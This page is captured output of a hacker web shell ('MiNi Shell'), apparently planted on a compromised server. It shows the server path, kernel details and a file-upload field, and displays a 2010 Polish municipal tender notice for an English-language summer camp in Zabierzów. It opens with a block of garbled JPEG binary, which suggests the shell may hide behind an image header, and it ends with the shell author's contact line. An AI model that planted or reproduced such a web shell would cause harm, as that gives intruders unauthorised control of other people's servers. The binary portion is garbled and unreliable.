JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100520/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100520/137950-N-2010.html

<p class="kh_header"><b>Zabierzów: Organizacja Letniego Obozu Języka Angielskiego</b><br>
<b>Numer ogłoszenia: 137950 - 2010; data zamieszczenia: 20.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zabierzów , ul. Kolejowa 11, 32-080 Zabierzów, woj. małopolskie, tel. (012) 285 11 40, faks (012) 285 21 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabierzow.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja Letniego Obozu Języka Angielskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja Letniego Obozu Językowego dla młodzieży wskazanej przez partnerskie gminy Zabierzów, Morawica i Krapkowice, 

- miejsce: okolice Krakowa - Pogórze Wielickie, Beskid Wyspowy
- wiek uczestników: 16-19 lat 
- liczba uczestników nie większa niż 60 osób plus 10 osobowa kadra, w tym kierownik obozu, trzech wychowawców i 6 native speakers, nauczycieli delegowanych przez partnerskie miasta Camas i Hillsboro.
Zamawiający zastrzega możliwość zmniejszenia liczby uczestników do 55 osób w razie mniejszej frekwencji.
- ośrodek położony :
a.w odległości co najmniej 1.000 m od dróg publicznych o dużym natężeniu ruchu,
b.w odległości co najmniej 1.000 m od zbiornika wodnego,
c.w lesie lub w odległości nie większej niż 500 m od ogólnodostępnego lasu,
d.w odległości nie większej niż 30 km od granic Krakowa.

Obowiązkiem Wykonawcy jest zapewnienie :
1.zakwaterowania dla uczestników i kadry,
2.pełnej obsługi gastronomicznej uczestników i kadry,
3.obsługę medyczną,
4.ubezpieczenia uczestników i kadry od następstw nieszczęśliwych wypadków,
5.sal wykładowych,
6.organizacji wycieczek wyjazdowych i lokalnych pieszych.

Do obowiązku Wykonawcy należy:

1.Zakwaterowanie uczestników i kadry
- teren ośrodka ogrodzony z 24-godzinną ochroną
- zakwaterowanie młodzieży i kadry w jednym budynku lub budynkach blisko siebie zlokalizowanych
- zakwaterowanie młodzieży w pokojach trzy i czteroosobowych (łóżka jednoosobowe)  z łazienką
- pokoje uczestników co najwyżej 4 - osobowe,
- zakwaterowanie kadry w pokojach dwuosobowych (łóżka jednoosobowe) z łazienką,
- zapewnienie przez Wykonawcę obsługi sprzątająco-porządkowej, polegającej na wymianie pościeli przynajmniej raz na 7 dni i sprzątaniu łazienek raz na 7 dni.

2.Obsługa gastronomiczna uczestników i kadry
- zapewnienie na terenie ośrodka stołówki
- zapewnienie wyżywienia: trzy posiłki: śniadanie, obiad, kolacja (prócz 11.7.2010 r. - tylko obiad i kolacja i 24.7.2010 r. - tylko śniadanie),
- zapewnienie suchego prowiantu w czasie wycieczek wyjazdowych i na drogę powrotną w dniu zakończenia obozu
- zapewnienie na terenie ośrodka miejsca do urządzenia ogniska lub grilla: dwa ogniska lub grille z pieczeniem kiełbasek

3.Obsługa medyczna
- zapewnienie na terenie ośrodka co najmniej jednego pomieszczenia izolatki z łazienką i węzłem sanitarnym
- zapewnienie całodobowej opieki medycznej - co najmniej w osobie jednej pielęgniarki,
- zapewnienie wyposażenia apteczki obozowej o minimalnej zawartości:
1)Gaziki sterylne (różnej wielkości np.5x5 3 op.; 7x7 3 op., 9x9 3 op.)
2)Gaza opatrunkowa sterylna tzw. kompres gazowy 2 szt. 0,5 m, 2 szt. 1m
3)Gaziki jałowe 1 op.
4)Nożyczki
5)Bandaż (opaska elastyczna) po 1 szt. z każdego rozmiaru
6)Bandaż dziany po 3 szt. z każdego rozmiaru
7)Chusta trójkątna + agrafka 2 szt.
8)Rękawiczki sterylne 2 pary
9)Rękawiczki gumowe 1 op.
10)Folia srebrno-złota termoizolacyjna(folia NRC) 1 szt.
11)Plaster na rolce 1 szt.
12)Plastry z opatrunkiem różnej wielkości 1 op.
13)Termometr 1 szt.
14)Leko gaziki nasączone spirytusem 1 op.
15)Worek samorozprężalny Ambu + maska lub maseczka do sztucznego oddychania tzw. metodą usta-usta
16) Rurki ustno gardłowe w różnych rozmiarach 2 szt.
17)Woda utleniona 2 szt.
18)Rivanol najlepiej w tab.
19)Sulfacetamid krople 1 op.
20)Altacet żel 
21)Panthenol spray lub coś podobnego na oparzenia 
22)Opatrunki Hydrożelowe 3 szt.
23)Aviomarin tab. 1 op.
24)Calcium 1op. 
25)Allertec tab. lub np. CetAlergin tab. 1 op.
26)Fenistil żel 1 szt.
27)Aspiryna tab. 1 op.
28)Naproxen żel 1 szt.
29)Cardiamid + Coffeina krople 1 szt.
30)Neospazmina surop
31)Paracetamol 1 op. w czopkach 
32)Apap lub Codipar tb 1 op.
33)Ibufen tab.1 op.
34)No-Spa tab.1 op.
35)Nifuroksazyd  tab.1 op.
36)Carbo medicinalis (węgiel leczniczy) 1 op.
37)Krople miętowe lub żołądkowe 1 szt.
38)Smecta  10 szt. lub np. Enterol
39)Lactulaza syrop lub np. tab Alax (ziołowy środek przeczyszczający) bądź herbatka przyspieszająca przemianę materii
40)Acatar Anti-Tabs lub Cirrus 1 op.
41)Tabletki do ssania na gardło np. Septolete  1 op.
42)Teraflu czy Gripex (na przeziębienie)
43)Kubki jednorazowe 1 op.
44)Kieliszki jednorazowe do leków 1 op.
45)Woda niegazowana (na bieżąco uzupełniana podobnie jak leki i środki opatrunkowe)
46)Dexapolcort (areozol)
47)Oxycort (areozol)

- w uzasadnionych i nagłych przypadkach, zapewnienie możliwości niezwłocznej konsultacji lekarskiej

4.Ubezpieczenie uczestników i kadry
- ubezpieczenie uczestników i kadry obozu od następstw nieszczęśliwych wypadków

5.Udostępnienie sal wykładowych
- zapewnienie na terenie ośrodka: trzech, klimatyzowanych sal szkoleniowych na zajęcia językowe: dla grup nie mniejszych niż 20 osób w dniach 12,13, 14, 15, 16, 19, 20, 21, 22 i 23 lipca w godzinach od 8.00 do 14.00
- wyposażenie sal szkoleniowych obejmujące co najmniej: WI-FI, flip-chart, projektor multimedialny

6.Organizację wycieczek wyjazdowych i lokalnych pieszych
- organizacja całodziennych wycieczek wyjazdowych dla 70 osób, w tym 60 uczestników obozu wraz z opiekunami (kadrą), obejmująca usługi transportowe, przewodnickie, wstępy do obiektów muzealnych i rekreacyjnych oraz suchy prowiant:
- wycieczka do Wieliczki i zwiedzanie Kopalni Soli w Wieliczce
- wycieczka do Krakowa - Trasa Królewska, Rynek, Wzgórze Wawelskie
- wycieczki wyjazdowe zostaną zorganizowane w dni wolne od pracy
- organizacja lokalnych wycieczek pieszych do miejsc atrakcyjnych ze względu na miejscową tradycję, historię lub widoki, obejmująca wstępy do obiektów

7.Inne
- zapewnienie na terenie ośrodka możliwości korzystania z urządzeń sportowo-rekreacyjnych :
a.nieodpłatnego dostępu co najmniej do:
1)basenu odkrytego pod opieka ratowników zgodnie z odrębnymi przepisami;
2) boiska do siatkówki plażowej;
3)boiska do piłki nożnej;
4)boiska do koszykówki;
5)siłowni
6)stołu bilardowego z wyposażeniem
7)stołu do tenisa stołowego z wyposażeniem
8)gry (piłkarzyki)
b.odpłatnego dostępu co najmniej do:
1)sauny;
2)kortu do tenisa ziemnego
3)groty solnej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.05-.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych usług w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Warunek zostanie uznany za spełniony, jeżeli w tych latach Wykonawca wykonał usługę o wartości co najmniej 50.000,00 zł brutto, polegającą na zakwaterowaniu i wyżywieniu jednej zorganizowanej grupy co najmniej 60 osób przez okres co najmniej dwóch tygodni lub przez taki sam okres równocześnie kilku grup o łącznej liczebności 60 osób, potwierdzone dokumentami, iż usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - załącznik nr 1.
2. Załącznik nr 3 zatytułowany (Podwykonawcy) żądamy wskazania, jaką część zamówienia Wykonawca zamierza powierzyć podwykonawcom.
Jeżeli Wykonawca nie zamierza powierzyć zamówienia podwykonawcy, załącza załącznik nr 3 do oferty z adnotacją (nie dotyczy).
3. Pełnomocnictwo do reprezentowania Wykonawcy w przypadku podpisywania oferty i pozostałych dokumentów przez pełnomocnika.
4. Podpisany lub zaparafowany projekt umowy.
5. Oświadczenie Wykonawcy, że obiekty w których będzie wykonywał umowę spełniają wszelkie wymogi przewidziane przepisami prawa dla organizacji wypoczynku i lub zajęć sportowych.
6. Kopię wydanej właścicielowi, zarządcy lub użytkownikowi obiektu opinii właściwej miejscowo komendy powiatowej (miejskiej) Państwowej Straży Pożarnej, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie warunków, jakie muszą spełnić organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabierzow.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać również w siedzibie Zamawiającego, pok. 30 lub za pośrednictwem poczty (opłata 10 zł.).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 10:00, miejsce: Urząd Gminy Zabierzów, Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com